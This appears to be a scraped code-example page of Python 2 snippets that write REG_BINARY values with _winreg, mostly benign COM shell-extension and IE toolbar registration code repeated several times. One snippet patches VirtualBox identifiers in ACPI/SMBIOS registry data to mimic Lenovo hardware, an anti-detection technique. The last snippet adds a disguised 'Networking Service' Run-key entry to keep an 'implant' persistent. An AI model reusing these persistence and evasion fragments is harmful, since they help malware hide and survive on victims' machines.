def DllRegisterServer():
import _winreg
key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" \
"Explorer\\Desktop\\Namespace\\" + \
ShellFolderRoot._reg_clsid_)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ShellFolderRoot._reg_desc_)
# And special shell keys under our CLSID
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT,
"CLSID\\" + ShellFolderRoot._reg_clsid_ + "\\ShellFolder")
# 'Attributes' is an int stored as a binary! use struct
attr = shellcon.SFGAO_FOLDER | shellcon.SFGAO_HASSUBFOLDER | \
shellcon.SFGAO_BROWSABLE
import struct
s = struct.pack("i", attr)
_winreg.SetValueEx(key, "Attributes", 0, _winreg.REG_BINARY, s)
print ShellFolderRoot._reg_desc_, "registration complete."
python类REG_BINARY的实例源码
def DllRegisterServer():
import _winreg
key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" \
"Explorer\\Desktop\\Namespace\\" + \
ShellFolderRoot._reg_clsid_)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ShellFolderRoot._reg_desc_)
# And special shell keys under our CLSID
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT,
"CLSID\\" + ShellFolderRoot._reg_clsid_ + "\\ShellFolder")
# 'Attributes' is an int stored as a binary! use struct
attr = shellcon.SFGAO_FOLDER | shellcon.SFGAO_HASSUBFOLDER | \
shellcon.SFGAO_BROWSABLE
import struct
s = struct.pack("i", attr)
_winreg.SetValueEx(key, "Attributes", 0, _winreg.REG_BINARY, s)
print ShellFolderRoot._reg_desc_, "registration complete."
def __setitem__(self, item, value):
item = str(item)
pyvalue = type(value)
if pyvalue is tuple and len(value)==2:
valuetype = value[1]
value = value[0]
else:
if pyvalue is dict or isinstance(value, RegistryDict):
d = RegistryDict(self.keyhandle, item)
d.clear()
d.update(value)
return
if pyvalue is str:
valuetype = _winreg.REG_SZ
elif pyvalue is int:
valuetype = _winreg.REG_DWORD
else:
valuetype = _winreg.REG_BINARY
value = 'PyPickle' + cPickle.dumps(value)
_winreg.SetValueEx(self.keyhandle, item, 0, valuetype, value)
def DllRegisterServer():
import _winreg
if sys.getwindowsversion()[0] < 6:
print "This sample only works on Vista"
sys.exit(1)
key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" \
"Explorer\\Desktop\\Namespace\\" + \
ShellFolder._reg_clsid_)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ShellFolder._reg_desc_)
# And special shell keys under our CLSID
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT,
"CLSID\\" + ShellFolder._reg_clsid_ + "\\ShellFolder")
# 'Attributes' is an int stored as a binary! use struct
attr = shellcon.SFGAO_FOLDER | shellcon.SFGAO_HASSUBFOLDER | \
shellcon.SFGAO_BROWSABLE
import struct
s = struct.pack("i", attr)
_winreg.SetValueEx(key, "Attributes", 0, _winreg.REG_BINARY, s)
# register the context menu handler under the FolderViewSampleType type.
keypath = "%s\\shellex\\ContextMenuHandlers\\%s" % (ContextMenu._context_menu_type_, ContextMenu._reg_desc_)
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT, keypath)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ContextMenu._reg_clsid_)
propsys.PSRegisterPropertySchema(get_schema_fname())
print ShellFolder._reg_desc_, "registration complete."
def DllRegisterServer():
comclass = IEToolbar
# register toolbar with IE
try:
print "Trying to register Toolbar.\n"
hkey = _winreg.CreateKey( _winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Internet Explorer\\Toolbar" )
subKey = _winreg.SetValueEx( hkey, comclass._reg_clsid_, 0, _winreg.REG_BINARY, "\0" )
except WindowsError:
print "Couldn't set registry value.\nhkey: %d\tCLSID: %s\n" % ( hkey, comclass._reg_clsid_ )
else:
print "Set registry value.\nhkey: %d\tCLSID: %s\n" % ( hkey, comclass._reg_clsid_ )
# TODO: implement reg settings for standard toolbar button
# unregister plugin
def DllRegisterServer():
comclass = IEToolbar
# register toolbar with IE
try:
print "Trying to register Toolbar.\n"
hkey = _winreg.CreateKey( _winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Internet Explorer\\Toolbar" )
subKey = _winreg.SetValueEx( hkey, comclass._reg_clsid_, 0, _winreg.REG_BINARY, "\0" )
except WindowsError:
print "Couldn't set registry value.\nhkey: %d\tCLSID: %s\n" % ( hkey, comclass._reg_clsid_ )
else:
print "Set registry value.\nhkey: %d\tCLSID: %s\n" % ( hkey, comclass._reg_clsid_ )
# TODO: implement reg settings for standard toolbar button
# unregister plugin
def patch_acpi(self):
# TODO This should be improved, but for now may suffice.
keywords = {
"VBOX": "LNVO",
"vbox": "lnvo",
"VirtualBox": "LENOVOTP",
"innotek GmbH": "",
}
regkeys = [
["SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data", "AcpiData"],
["SYSTEM\\ControlSet001\\Services\\mssmbios\\Data", "AcpiData"],
["SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data", "SMBiosData"],
["SYSTEM\\ControlSet001\\Services\\mssmbios\\Data", "SMBiosData"],
]
for regkey, key in regkeys:
value = query_value(HKEY_LOCAL_MACHINE, regkey, key)
if value is None:
continue
for k, v in keywords.items():
value = value.replace(k, v)
set_regkey(HKEY_LOCAL_MACHINE, regkey, key, REG_BINARY, value)
if regkey_exists(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\DSDT\\VBOX__"):
rename_regkey(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\DSDT\\VBOX__", "LENOVO")
rename_regkey(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\FADT\\VBOX__", "LENOVO")
rename_regkey(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\RSDT\\VBOX__", "LENOVO")
def patch_acpi(self):
# TODO This should be improved, but for now may suffice.
keywords = {
"VBOX": "LNVO",
"vbox": "lnvo",
"VirtualBox": "LENOVOTP",
"innotek GmbH": "",
}
regkeys = [
["SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data", "AcpiData"],
["SYSTEM\\ControlSet001\\Services\\mssmbios\\Data", "AcpiData"],
["SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data", "SMBiosData"],
["SYSTEM\\ControlSet001\\Services\\mssmbios\\Data", "SMBiosData"],
]
for regkey, key in regkeys:
value = query_value(HKEY_LOCAL_MACHINE, regkey, key)
if value is None:
continue
for k, v in keywords.items():
value = value.replace(k, v)
set_regkey(HKEY_LOCAL_MACHINE, regkey, key, REG_BINARY, value)
if regkey_exists(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\DSDT\\VBOX__"):
rename_regkey(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\DSDT\\VBOX__", "LENOVO")
rename_regkey(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\FADT\\VBOX__", "LENOVO")
rename_regkey(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\RSDT\\VBOX__", "LENOVO")
def DllRegisterServer():
import _winreg
if sys.getwindowsversion()[0] < 6:
print "This sample only works on Vista"
sys.exit(1)
key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" \
"Explorer\\Desktop\\Namespace\\" + \
ShellFolder._reg_clsid_)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ShellFolder._reg_desc_)
# And special shell keys under our CLSID
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT,
"CLSID\\" + ShellFolder._reg_clsid_ + "\\ShellFolder")
# 'Attributes' is an int stored as a binary! use struct
attr = shellcon.SFGAO_FOLDER | shellcon.SFGAO_HASSUBFOLDER | \
shellcon.SFGAO_BROWSABLE
import struct
s = struct.pack("i", attr)
_winreg.SetValueEx(key, "Attributes", 0, _winreg.REG_BINARY, s)
# register the context menu handler under the FolderViewSampleType type.
keypath = "%s\\shellex\\ContextMenuHandlers\\%s" % (ContextMenu._context_menu_type_, ContextMenu._reg_desc_)
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT, keypath)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ContextMenu._reg_clsid_)
propsys.PSRegisterPropertySchema(get_schema_fname())
print ShellFolder._reg_desc_, "registration complete."
def DllRegisterServer():
comclass = IEToolbar
# register toolbar with IE
try:
print "Trying to register Toolbar.\n"
hkey = _winreg.CreateKey( _winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Internet Explorer\\Toolbar" )
subKey = _winreg.SetValueEx( hkey, comclass._reg_clsid_, 0, _winreg.REG_BINARY, "\0" )
except WindowsError:
print "Couldn't set registry value.\nhkey: %d\tCLSID: %s\n" % ( hkey, comclass._reg_clsid_ )
else:
print "Set registry value.\nhkey: %d\tCLSID: %s\n" % ( hkey, comclass._reg_clsid_ )
# TODO: implement reg settings for standard toolbar button
# unregister plugin
def __init__(self):
threading.Thread.__init__(self)
try:
with _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", _winreg.KEY_SET_VALUE) as reg:
_winreg.SetValueEx(reg, "Networking Service", 0, _winreg.REG_BINARY, BinaryLocation)
reg.Close()
except:
pass
# Do things over and over to keep the implant protected
